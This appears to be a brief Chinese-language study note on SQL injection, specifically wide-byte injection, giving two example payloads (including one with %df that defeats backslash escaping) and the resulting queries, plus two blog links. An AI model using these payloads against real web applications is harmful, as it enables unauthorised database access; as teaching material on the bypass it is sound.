渗透测试——SQL注入
1、宽字节注入
宽字节注入:
参考链接:
https://blog.csdn.net/heiseweiye/article/details/82723478
https://blog.csdn.net/weixin_39934520/article/details/105968747
id=1' and 1=1%23
select * from user where id ='1\' and 1=1#'
id=1%df' and 1=1%23
select * from user where id ='1運' and 1=1#'